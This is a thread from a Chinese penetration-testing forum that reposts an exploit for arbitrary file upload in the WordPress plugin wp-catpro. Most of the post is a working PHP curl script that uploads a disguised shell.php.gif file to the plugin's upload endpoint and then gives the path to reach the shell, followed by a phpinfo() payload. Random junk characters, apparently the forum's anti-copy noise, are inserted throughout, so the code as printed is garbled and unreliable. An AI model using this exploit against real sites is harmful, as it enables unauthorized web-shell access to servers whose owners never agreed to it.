找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress插件wp-catpro任意文件上传
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2080|回复: 0
打印 上一主题 下一主题

WordPress插件wp-catpro任意文件上传

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-2-27 20:12:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability" z) Z3 w" }2 t1 Q  F% n% _
#-----------------------------------------------------------------------
) J$ G& e; L8 E' _* N8 x% r, [' e
* \9 i9 ?: U8 M作者  => Zikou-16. p; O; I. V/ }# N
邮箱 => zikou16x@gmail.com  H/ L4 S, K$ X7 I+ w, e
测试系统 : Windows 7 , Backtrack 5r3
7 \6 F; m* e9 I* U; s/ Y- U下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
. i4 w; V) I* J2 p1 k% J: R####
- f/ X& A: a& I, D8 R: ?
& U; W% G4 G/ g8 J#=> Exploit 信息:% Y2 W' W- r5 G
------------------
7 d1 A; q0 C) G$ N6 Y# 攻击者可以上传 file/shell.php.gif
7 h. g  J! [7 b: H8 [  M# ("jpg", "gif", "png")  // Allowed file extensions
( B& D& k" U- U! N6 }# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)% [* g+ c7 b2 `: K+ k
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)) E9 L6 _5 }% Q6 G
------------------6 v3 B3 f) s. c" a7 B% m# N& n

( ^8 H  U' W, w- ?" j#=> Exploit+ }1 j& S  `- z. i
-----------/ T+ Z; z2 M# R9 S/ p' d( ]" x
<?php
7 c. _( {4 M) s. q0 T9 r # e( W' {, m1 z% ~
$uploadfile="zik.php.gif";5 \2 j) l$ _( q+ r% r3 L+ g9 V
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
2 q  r) P0 q$ [# J, qcurl_setopt($ch, CURLOPT_POST, true);
0 o* W+ W& e9 T6 @4 I! ?curl_setopt($ch, CURLOPT_POSTFIELDS,
) Y3 c! X, D2 carray('Filedata'=>"@$uploadfile",$ i1 u) m- K% l5 t4 U8 z( ^
'folder'=>'/wp-content/uploads/catpro/'));
8 w2 ?1 M+ g; M! z4 _) ~  |curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);5 t: Z% Y. L( e/ M# [
$postResult = curl_exec($ch);- P6 ~( a$ Q- x8 I% w0 r
curl_close($ch);
" {( ]9 Q4 p5 C0 \: [
. v& ^3 O/ i! ?! f& eprint "$postResult";) G! Y6 G( `5 Y  p1 C

6 L/ d4 Z8 d1 c  r) \( _Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif0 {8 q2 l' `  l: T) a: l5 B
  ?>
( i- U7 v- }! |' P<?php
' G5 Q1 s% L1 l; qphpinfo();0 T$ a7 @0 E4 w+ c3 O' S
?>
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表